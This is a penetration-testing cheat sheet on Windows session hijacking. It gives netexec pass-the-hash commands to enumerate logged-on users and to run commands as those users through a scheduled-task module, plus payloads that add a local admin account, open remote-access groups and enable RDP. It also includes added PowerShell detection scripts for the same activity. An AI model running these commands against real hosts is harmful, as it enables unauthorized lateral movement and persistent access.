# Session Hijack

## Windows

Session hijacking in Windows is a powerful and easy way to pivot deeper into an AD environment: with local admin on a host, you run commands in the context of another user who is already logged on there, so their domain privileges become yours without ever touching their credentials.

### Find logged in users

```bash
## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB         <target>   445    <hostname>   [+] Enumerated logged_on users
SMB         <target>   445    <hostname>   DOM\username             logon_server: DC.DOM.LOCAL

## Locally using cmd/powershell
> query user /server:127.0.0.1
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 void                  console             2  Active      none   2024-10-14 07:29

> qwinsta /server:127.0.0.1
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           void                      2  Active
```

### Base command

```bash
## Execute command on target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"<command>\""

## Execute command on new target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName <new-target-host> -ScriptBlock {<command>}\""
```
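The `schtask_as` module above works by registering a scheduled task whose principal is the hijacked user while the task is created by the admin account you authenticated with. That mismatch is what a defender hunts for. The following is an added example (not part of this cheat sheet and not netexec code) that scans the Security log for event 4698 ("A scheduled task was created") and reports every task whose run-as principal differs from the creating subject. It assumes "Audit Other Object Access Events" is enabled for Success so that 4698 is actually written, an elevated shell, and a 24-hour default look-back window.

```powershell
# Added example: hunt for scheduled tasks registered to run as a different user
# than the account that created them (the footprint schtask_as leaves behind).
# Assumes event 4698 is being logged (Audit Other Object Access Events: Success).

function Get-TaskRegisteredAsOtherUser {
    param(
        [int]$Hours = 24,                          # look-back window (assumed default)
        [string]$ComputerName = $env:COMPUTERNAME  # local host unless told otherwise
    )

    $filter = @{
        LogName   = 'Security'
        Id        = 4698                           # "A scheduled task was created"
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # TaskContent carries the task's own XML definition; Principal/UserId is who it runs as.
        $task  = [xml]$data['TaskContent']
        $runAs = $task.Task.Principals.Principal.UserId

        # Compare bare account names so "DOM\user" and "user" are treated as the same identity.
        $runAsName   = ($runAs -split '\\')[-1]
        $creatorName = $data['SubjectUserName']

        if ($runAs -and ($runAsName -ne $creatorName)) {
            $exec = $task.Task.Actions.Exec
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Computer    = $_.MachineName
                TaskName    = $data['TaskName']
                CreatedBy   = "$($data['SubjectDomainName'])\$creatorName"
                RunsAs      = $runAs
                Command     = ("$($exec.Command) $($exec.Arguments)").Trim()
            }
        }
    }
}

# Usage: list suspicious registrations from the last two days.
Get-TaskRegisteredAsOtherUser -Hours 48 | Format-Table -AutoSize
```

Legitimate software does register tasks under service accounts, so treat the output as a triage list: a task created by an interactive admin that runs `powershell.exe` as a logged-on domain user, and is deleted again minutes later, is the pattern to escalate. Pair it with event 4702 (task updated) and 4699 (task deleted) if you want to see the cleanup.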

### Useful payloads

```powershell
## Create new local user
net user <username> <password> /add

## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add

## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow
```
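The payloads above leave a small but distinctive configuration footprint: a new local account, membership in three local groups, `fDenyTSConnections` flipped to 0, and an inbound allow rule on 3389. The following is an added example (not from this cheat sheet) that collects that footprint on a host in one call so it can be compared against a known-good baseline. It assumes an elevated PowerShell 5.1 or later session with the `NetSecurity` and `Microsoft.PowerShell.LocalAccounts` modules present, and uses a 7-day window for "recently created" accounts, which is an assumed threshold rather than anything the page states.

```powershell
# Added example: report the host-side footprint of the payloads above so it can be
# diffed against a baseline. Group names and the registry value are the page's own;
# the 7-day "recent account" window is an assumption.

function Get-HijackFootprint {
    # RDP enablement: fDenyTSConnections = 0 means connections are allowed.
    $rdpKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $fDeny  = (Get-ItemProperty -Path $rdpKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections

    # Any enabled inbound allow rule that opens TCP 3389, whatever it was named.
    $rdpRules = Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow -ErrorAction SilentlyContinue |
        Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains '3389' } |
        Select-Object -ExpandProperty DisplayName

    # Local (non-domain) principals in the groups the payloads add to.
    $groups  = 'Administrators', 'Remote Desktop Users', 'Remote Management Users'
    $members = foreach ($g in $groups) {
        Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue |
            Where-Object { $_.PrincipalSource -eq 'Local' } |
            ForEach-Object { [pscustomobject]@{ Group = $g; Member = $_.Name } }
    }

    # Enabled local accounts whose password was set in the last 7 days; a fresh
    # `net user /add` shows up here even if the account was created quietly.
    $recentUsers = Get-LocalUser | Where-Object {
        $_.Enabled -and $_.PasswordLastSet -and $_.PasswordLastSet -gt (Get-Date).AddDays(-7)
    } | Select-Object -ExpandProperty Name

    [pscustomobject]@{
        Computer          = $env:COMPUTERNAME
        RdpEnabled        = ($fDeny -eq 0)
        RdpFirewallRules  = @($rdpRules)
        LocalGroupMembers = @($members)
        RecentLocalUsers  = @($recentUsers)
    }
}

# Usage: print the footprint; export to JSON if you want to diff it against a baseline.
Get-HijackFootprint | Format-List
```

The configuration check is the cheap half; for the "who did it and when" half, the same changes are recorded as Security events 4720 (user account created), 4732 (member added to a security-enabled local group) and 4657 (registry value modified, if object auditing is configured on the `Terminal Server` key), all attributed to the admin account that ran the payload.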

***

## Web

Session cookies: find them and use them.
